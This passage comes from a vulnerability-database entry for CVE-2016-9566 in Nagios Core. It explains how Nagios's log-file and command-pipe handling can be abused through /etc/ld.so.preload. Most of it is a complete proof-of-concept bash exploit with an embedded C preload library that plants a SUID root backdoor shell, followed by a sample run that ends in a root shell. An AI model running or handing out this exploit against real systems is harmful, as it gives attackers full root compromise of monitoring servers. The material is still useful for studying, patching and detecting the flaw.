950 Dec 10 11:56 /etc/ld.so.preload ``` which would enable write access to the file for the 'nagios' user but not the 'nagios' group. Gaining write access to ld.so.preload as 'nagios' group If the attacker managed to exploit the CVE-2016-9565 vulnerability explained at: https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html they would gain access to www-data account belonging to 'nagios' group in case of a default Nagios install following the official Nagios setup guide: https://assets.nagios.com/downloads/nagioscore/docs/Installing_Nagios_Core_From_Source.pdf This would not be enough to write to ld.so.preload file as 'nagios' group is only allowed to read the log file. Attackers with access to 'nagios' group could however bypass the lack of write privilege by writing to Nagios external command pipe (nagios.cmd) which is writable by 'nagios' group by default: ``` prw-rw---- 1 nagios nagios 0 Dec 10 19:39 nagios.cmd ``` The Nagios command pipe allows to communicate with Nagios daemon. By sending an invalid command to the pipe, the attacker could bypass the lack of write permission and inject data to the log file (pointing to ld.so.preload). For example, by running the command: ``` /usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so \n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd ``` Nagios daemon would append the following line to the log file: ``` [1481439996] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so ``` which would be enough to load a malicious library and escalate the privileges from a www-data user (belonging to 'nagios' group) to root upon a Nagios restart. #### Forcing restart of Nagios daemon Attackers could speed up the restart by using the Nagios command pipe once again to send a SHUTDOWN_PROGRAM command as follows: ``` /usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > /usr/local/nagios/var/rw/nagios.cmd ``` V. PROOF OF CONCEPT EXPLOIT ------------------------- -----------[ nagios-root-privesc.sh ]-------------- ``` #!/bin/bash # # Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit # nagios-root-privesc.sh (ver. 1.0) # # CVE-2016-9566 # # Discovered and coded by: # # Dawid Golunski # dawid[at]legalhackers.com # # https://legalhackers.com # # Follow https://twitter.com/dawid_golunski for updates on this advisory # # # [Info] # # This PoC exploit allows privilege escalation from 'nagios' system account, # or an account belonging to 'nagios' group, to root (root shell). # Attackers could obtain such an account via exploiting another vulnerability, # e.g. CVE-2016-9565 linked below. # # [Exploit usage] # # ./nagios-root-privesc.sh path_to_nagios.log # # # See the full advisory for details at: # https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html # # Video PoC: # https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html # # CVE-2016-9565: # https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html # # Disclaimer: # For testing purposes only. Do no harm. # BACKDOORSH="/bin/bash" BACKDOORPATH="/tmp/nagiosrootsh" PRIVESCLIB="/tmp/nagios_privesc_lib.so" PRIVESCSRC="/tmp/nagios_privesc_lib.c" SUIDBIN="/usr/bin/sudo" commandfile='/usr/local/nagios/var/rw/nagios.cmd' function cleanexit { # Cleanup echo -e "\n[+] Cleaning up..." rm -f $PRIVESCSRC rm -f $PRIVESCLIB rm -f $ERRORLOG touch $ERRORLOG if [ -f /etc/ld.so.preload ]; then echo -n > /etc/ld.so.preload fi echo -e "\n[+] Job done. Exiting with code $1 \n" exit $1 } function ctrl_c() { echo -e "\n[+] Ctrl+C pressed" cleanexit 0 } #intro echo -e "\033[94m \nNagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) \nnagios-root-privesc.sh (ver. 1.0)\n" echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m" # Priv check echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m" id | grep -q nagios if [ $? -ne 0 ]; then echo -e "\n[!] You need to execute the exploit as 'nagios' user or 'nagios' group ! Exiting.\n" exit 3 fi # Set target paths ERRORLOG="$1" if [ ! -f "$ERRORLOG" ]; then echo -e "\n[!] Provided Nagios log path ($ERRORLOG) doesn't exist. Try again. E.g: \n" echo -e "./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log\n" exit 3 fi # [ Exploitation ] trap ctrl_c INT # Compile privesc preload library echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" cat <<_solibeof_>$PRIVESCSRC #define _GNU_SOURCE #include <stdio.h> #include <sys/stat.h> #include <unistd.h> #include <dlfcn.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> uid_t geteuid(void) { static uid_t (*old_geteuid)(); old_geteuid = dlsym(RTLD_NEXT, "geteuid"); if ( old_geteuid() == 0 ) { chown("$BACKDOORPATH", 0, 0); chmod("$BACKDOORPATH", 04777); unlink("/etc/ld.so.preload"); } return old_geteuid(); } _solibeof_ /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" if [ $? -ne 0 ]; then echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC." cleanexit 2; fi # Prepare backdoor shell cp $BACKDOORSH $BACKDOORPATH echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" # Safety check if [ -f /etc/ld.so.preload ]; then echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." exit 2 fi # Symlink the Nagios log file rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG if [ $? -ne 0 ]; then echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." cleanexit 3 fi echo -e "\n[+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`" { # Wait for Nagios to get restarted echo -ne "\n[+] Waiting for Nagios service to get restarted...\n" echo -n "Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] " read THE_ANSWER if [ "$THE_ANSWER" = "y" ]; then /usr/bin/printf "[%lu] SHUTDOWN_PROGRAM\n" `date +%s` > $commandfile fi sleep 3s ps aux | grep -v grep | grep -i 'bin/nagios' if [ $? -ne 0 ]; then echo -ne "\n[+] Nagios stopped. Shouldn't take long now... ;)\n" fi while :; do sleep 1 2>/dev/null if [ -f /etc/ld.so.preload ]; then rm -f $ERRORLOG break; fi done echo -e "\n[+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: \n`ls -l /etc/ld.so.preload`" # /etc/ld.so.preload should be owned by nagios:nagios at this point with perms: # -rw-r--r-- 1 nagios nagios # Only 'nagios' user can write to it, but 'nagios' group can not. # This is not ideal as in scenarios like CVE-2016-9565 we might be running as www-data:nagios user. # We can bypass the lack of write perm on /etc/ld.so.preload by writing to Nagios external command file/pipe # nagios.cmd, which is writable by 'nagios' group. We can use it to send a bogus command which will # inject the path to our privesc library into the nagios.log file (i.e. the ld.so.preload file :) sleep 3s # Wait for Nagios to create the nagios.cmd pipe if [ ! -p $commandfile ]; then echo -e "\n[!] Nagios command pipe $commandfile does not exist!" exit 2 fi echo -e "\n[+] Injecting $PRIVESCLIB via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload" now=`date +%s` /usr/bin/printf "[%lu] NAGIOS_GIVE_ME_ROOT_NOW!;; $PRIVESCLIB \n" $now > $commandfile sleep 1s grep -q "$PRIVESCLIB" /etc/ld.so.preload if [ $? -eq 0 ]; then echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload | grep "$PRIVESCLIB"`" else echo -e "\n[!] Unable to inject the lib to /etc/ld.so.preload" exit 2 fi } 2>/dev/null # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) echo -e "\n[+] Triggering privesc code from $PRIVESCLIB by executing $SUIDBIN SUID binary" sudo 2>/dev/null >/dev/null # Check for the rootshell ls -l $BACKDOORPATH | grep rws | grep -q root 2>/dev/null if [ $? -eq 0 ]; then echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" echo -e "\n\033[94mGot root via Nagios!\033[0m" else echo -e "\n[!] Failed to get root: \n`ls -l $BACKDOORPATH`" cleanexit 2 fi # Use the rootshell to perform cleanup that requires root privileges $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" rm -f $ERRORLOG echo > $ERRORLOG # Execute the rootshell echo -e "\n[+] Nagios pwned. Spawning the rootshell $BACKDOORPATH now\n" $BACKDOORPATH -p -i # Job done. cleanexit 0 ``` #### Example run ``` www-data@debjessie:/tmp$ ./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log ./nagios-root-privesc.sh /usr/local/nagios/var/nagios.log Nagios Core - Root Privilege Escalation PoC Exploit (CVE-2016-9566) nagios-root-privesc.sh (ver. 1.0) Discovered and coded by: Dawid Golunski https://legalhackers.com [+] Starting the exploit as: uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd) [+] Compiling the privesc shared library (/tmp/nagios_privesc_lib.c) [+] Backdoor/low-priv shell installed at: -rwxrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh [+] The system appears to be exploitable (writable logdir) ! :) Symlink created at: lrwxrwxrwx 1 www-data nagios 18 Dec 11 08:44 /usr/local/nagios/var/nagios.log -> /etc/ld.so.preload [+] Waiting for Nagios service to get restarted... Do you want to shutdown the Nagios daemon to speed up the restart process? ;) [y/N] y [+] Nagios stopped. Shouldn't take long now... ;) [+] Nagios restarted. The /etc/ld.so.preload file got created with the privileges: -rw-r--r-- 1 nagios nagios 871 Dec 11 08:44 /etc/ld.so.preload [+] Injecting /tmp/nagios_privesc_lib.so via the pipe nagios.cmd to bypass lack of write perm on ld.so.preload [+] The /etc/ld.so.preload file now contains: [1481463869] Warning: Unrecognized external command -> NAGIOS_GIVE_ME_ROOT_NOW!;; /tmp/nagios_privesc_lib.so [+] Triggering privesc code from /tmp/nagios_privesc_lib.so by executing /usr/bin/sudo SUID binary [+] Rootshell got assigned root SUID perms at: -rwsrwxrwx 1 root root 1029624 Dec 11 08:44 /tmp/nagiosrootsh Got root via Nagios! [+] Nagios pwned. Spawning the rootshell /tmp/nagiosrootsh now nagiosrootsh-4.3# exit exit [+] Cleaning up... [+] Job done. Exiting with code 0 ``` #### Video PoC: https://legalhackers.com/videos/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html BUSINESS IMPACT ------------------------- An attacker who has managed to gain access to 'nagios' account, or an account belonging to 'nagios' group (which is the case in the CVE-2016-9565 scenario) to escalate their privileges to root and fully compromise the Nagios monitoring server. |
| id | SSV:92575 |
| last seen | 2017-11-19 |
| modified | 2016-12-16 |
| published | 2016-12-16 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-92575 |
| title | Nagios Core < 4.2.4 - Root Privilege Escalation (CVE-2016-9566) |
References
- http://rhn.redhat.com/errata/RHSA-2017-0211.html
- http://rhn.redhat.com/errata/RHSA-2017-0212.html
- http://rhn.redhat.com/errata/RHSA-2017-0213.html
- http://rhn.redhat.com/errata/RHSA-2017-0214.html
- http://rhn.redhat.com/errata/RHSA-2017-0258.html
- http://rhn.redhat.com/errata/RHSA-2017-0259.html
- http://seclists.org/fulldisclosure/2016/Dec/58
- http://www.securityfocus.com/bid/94919
- http://www.securitytracker.com/id/1037487
- https://bugzilla.redhat.com/show_bug.cgi?id=1402869
- https://github.com/NagiosEnterprises/nagioscore/commit/c29557dec91eba2306f5fb11b8da4474ba63f8c4
- https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
- https://lists.debian.org/debian-lts-announce/2018/12/msg00014.html
- https://security.gentoo.org/glsa/201612-51
- https://security.gentoo.org/glsa/201702-26
- https://security.gentoo.org/glsa/201710-20
- https://www.exploit-db.com/exploits/40921/
- https://www.nagios.org/projects/nagios-core/history/4x/